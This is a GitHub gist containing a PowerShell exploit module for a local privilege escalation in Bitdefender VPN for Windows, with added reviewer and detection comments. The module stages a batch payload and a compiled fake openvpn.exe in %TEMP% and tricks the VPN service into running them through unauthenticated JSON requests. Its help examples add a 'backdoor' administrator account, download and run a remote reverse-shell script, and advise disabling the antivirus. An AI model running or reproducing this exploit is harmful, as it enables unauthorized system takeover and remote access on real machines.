
@ykoster
Created January 31, 2020 22:35
Exploit module for Bitdefender VPN for Windows
<#
.Synopsis
Exploit module for Bitdefender VPN for Windows
.Parameter Command
Command(s) to be executed when openvpn.exe is started
.Example
Import-Module .\Invoke-ExploitBdVpnLpe.psm1
Invoke-ExploitBdVpnLpe "net user backdoor P@ssword /add" "net localgroup administrators backdoor /add"
Invoke-ExploitBdVpnLpe -Command "powershell -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')"
Note: this proof of concept may be blocked by Bitdefender Advanced Threat Defense, disable if needed
#>
Function Invoke-ExploitBdVpnLpe {
Param([Parameter(Position = 0, Mandatory = $true, ValueFromRemainingArguments = $true)] [string[]]$Command)
# Overview (reviewer notes, derived from the code below):
#   1. Require the AfVpnService Windows service to be running.
#   2. Write the caller's command lines to payload.bat in a fresh %TEMP% folder and
#      compile a stub named openvpn.exe next to it that launches payload.bat.
#   3. Send JSON messages ("check", "disconnect", "connect") to the TCP listener owned
#      by the VpnService process, with vpnExecutablePath set to that temp folder.
#   4. Wait, disconnect again, and delete the temp folder.
# NOTE(review): the underlying weakness appears to be that the service accepts an
# executable directory from an unauthenticated local client - the messages built here
# carry no credential or token - and, per the module help, starts openvpn.exe from it.
# The service's privilege level is not visible in this file; the module name suggests
# local privilege escalation - confirm against the vendor advisory.
# Defender view: the service side should authenticate its callers and pin the OpenVPN
# binary to its install directory instead of taking the path from the request.

# Get-Service with -ErrorAction Stop raises a terminating error when the service does not
# exist. If it exists but is not Running, the VPN UI is opened and the function returns.
If($(Get-Service -Name AfVpnService -ErrorAction Stop).Status -ne [System.ServiceProcess.ServiceControllerStatus]::Running) {
& "$env:ProgramFiles\Bitdefender\Bitdefender VPN\bdvpnuiapp.exe" "/show"
Write-Error "AfVpnService is not running, enable it by manually connecting to the VPN service"
Return
}
# Send-Command: sends one JSON request to the listener at $Ip:$Port over IPv4 TCP and
# returns the reply parsed from JSON.
#   $Command - value stored under the "command" key of the request
#   $Params  - further request fields; NOTE: the hashtable is modified in place, and
#              Add() throws if it already contains a "command" key
#   $Ip/$Port - listener address (defaults 127.0.0.1:31337)
Function Send-Command {
Param([Parameter(Position = 0, Mandatory = $true)] [string]$Command,
[Parameter(Position = 1, Mandatory = $false)] [hashtable]$Params = @{},
[Parameter(Position = 2, Mandatory = $false)] [string]$Ip = "127.0.0.1",
[Parameter(Position = 3, Mandatory = $false)] [int]$Port = 31337)
$End = New-Object System.Net.IPEndPoint([system.net.IPAddress]::Parse($Ip)), ([int]$Port)
$Saddrf = [System.Net.Sockets.AddressFamily]::InterNetwork
$Stype = [System.Net.Sockets.SocketType]::Stream
$Ptype = [System.Net.Sockets.ProtocolType]::TCP
# The request consists only of the command name plus the supplied parameters,
# serialised as JSON and encoded as UTF-8.
$Params.Add("command", $Command)
$Data = [System.Text.Encoding]::UTF8.GetBytes($(ConvertTo-Json -InputObject $Params))
$Sock = New-Object System.Net.Sockets.Socket $saddrf, $stype, $ptype
$Sock.Connect($End)
$null = $Sock.Send($Data)
# The reply is read with a single Receive() into a 1024-byte buffer, so anything longer
# or delivered in several segments is cut short. The socket is not closed if Connect,
# Send or Receive throws.
$Buffer = New-Object byte[](1024)
$Length = $Sock.Receive($Buffer)
$Sock.Close()
Return ConvertFrom-Json -InputObject $([System.Text.Encoding]::UTF8.GetString($Buffer,0 , $Length))
}
# Check-Vpn: sends "check" and returns the reply's isSuccess field; any exception
# (connection refused, malformed reply, ...) is reported as $false.
Function Check-Vpn {
Param([Parameter(Position = 0, Mandatory = $false)] [string]$Ip = "127.0.0.1",
[Parameter(Position = 1, Mandatory = $false)] [int]$Port = 31337)
Try {
Return $(Send-Command -Command "check" -Ip $Ip -Port $Port).isSuccess
} Catch {
Return $false
}
}
# Connect-Vpn: sends "connect" with the fields below and returns the whole parsed reply
# (unlike Check-Vpn / Disconnect-Vpn, which return only .isSuccess).
# vpnExecutablePath is taken from the caller; the default points into the product's
# install directory. NOTE(review): the field names are presumably those the service
# expects - they are not defined anywhere in this file.
Function Connect-Vpn {
Param([Parameter(Position = 0, Mandatory = $false)] [string]$RemoteIp = "127.0.0.1",
[Parameter(Position = 1, Mandatory = $false)] [string]$RemotePort = "",
[Parameter(Position = 2, Mandatory = $false)] [string]$Protocol = "udp",
[Parameter(Position = 3, Mandatory = $false)] [string]$VpnExecutablePath = "$env:ProgramFiles\Bitdefender\Bitdefender VPN\AfVpnService",
[Parameter(Position = 4, Mandatory = $false)] [string]$AuthFilename = "deadebeefdeadebeefdeadebeefdeade.txt",
[Parameter(Position = 5, Mandatory = $false)] [bool]$EnableLog = $true,
[Parameter(Position = 6, Mandatory = $false)] [string]$Ip = "127.0.0.1",
[Parameter(Position = 7, Mandatory = $false)] [int]$Port = 31337)
$Params = @{
vpnExecutablePath = $VpnExecutablePath
ip = $RemoteIp
port = $RemotePort
protocol = $Protocol
authFilename = $AuthFilename
enableLog = $EnableLog
}
Return $(Send-Command -Command "connect" -Params $Params -Ip $Ip -Port $Port)
}
# Disconnect-Vpn: sends "disconnect" and returns the reply's isSuccess field.
# There is no Try/Catch here, so socket or JSON errors propagate to the caller.
Function Disconnect-Vpn {
Param([Parameter(Position = 0, Mandatory = $false)] [string]$Ip = "127.0.0.1",
[Parameter(Position = 1, Mandatory = $false)] [int]$Port = 31337)
Return $(Send-Command -Command "disconnect" -Ip $Ip -Port $Port).isSuccess
}
# Staging: a GUID-named directory under %TEMP% receives payload.bat (the caller's
# command lines, ASCII) and openvpn.cs.
# Detection note: a folder under a user's %TEMP% holding payload.bat, openvpn.cs and
# openvpn.exe is the on-disk artefact of this module.
$tmpfolder = "$env:TEMP\" + [System.Guid]::NewGuid()
New-Item -Type directory -Path "$tmpfolder" | Out-Null
Set-Content "$tmpfolder\payload.bat" -Encoding ASCII $Command
# The C# source written below is a stub whose Main() starts payload.bat and swallows
# any exception. Backslashes in the temp path are doubled so the path is a valid C#
# string literal.
Set-Content "$tmpfolder\openvpn.cs" -Encoding ASCII "
class Program
{
static void Main()
{
try {
System.Diagnostics.Process.Start(`"$($tmpfolder.Replace("\", "\\"))\\payload.bat`");
} catch(System.Exception) { }
}
}
"
# The stub is compiled with the csc.exe found in the running .NET runtime directory.
# Detection note: csc.exe writing an executable named openvpn.exe into %TEMP% is unusual
# and worth alerting on.
& "$([System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory())csc.exe" "/out:$tmpfolder\openvpn.exe" "$tmpfolder\openvpn.cs"
# Ask the VPN application to exit before talking to the service directly.
& "$env:ProgramFiles\Bitdefender\Bitdefender VPN\BdVpnApp.exe" "/exit"
# Locate the listening TCP socket(s) owned by the process named VpnService.
# -ErrorAction Stop raises a terminating error if no such process exists; in that case
# the clean-up at the end is skipped and the temp folder stays on disk.
# NOTE(review): if the process owns several listeners, $tcpservice holds several objects
# and .LocalAddress / .LocalPort yield arrays - presumably only one is expected.
$tcpservice = Get-NetTCPConnection -State Listen -OwningProcess $(Get-Process -Name VpnService -ErrorAction Stop).Id
If (Check-Vpn -Ip $tcpservice.LocalAddress -Port $tcpservice.LocalPort) {
Disconnect-Vpn -Ip $tcpservice.LocalAddress -Port $tcpservice.LocalPort | Out-Null
# The connect request names the temp folder as vpnExecutablePath. Connect-Vpn returns
# the parsed reply object, so this If tests that a reply came back, not its isSuccess.
# Detection note: openvpn.exe running from outside the product's install directory, or
# the VPN service spawning a .bat / cmd.exe child, indicates this path was taken.
If(Connect-Vpn -VpnExecutablePath $tmpfolder -Ip $tcpservice.LocalAddress -Port $tcpservice.LocalPort) {
# Fixed 5 second wait before disconnecting again.
Start-Sleep 5
Disconnect-Vpn -Ip $tcpservice.LocalAddress -Port $tcpservice.LocalPort | Out-Null
}
}
# clean up
# Runs only when no earlier statement raised a terminating error (there is no
# Try/Finally), so staged files can remain after a failed run.
Remove-Item $tmpfolder -Force -Recurse
}
# Expose only the entry point; the helper functions are nested inside it and stay private.
Export-ModuleMember -Function 'Invoke-ExploitBdVpnLpe'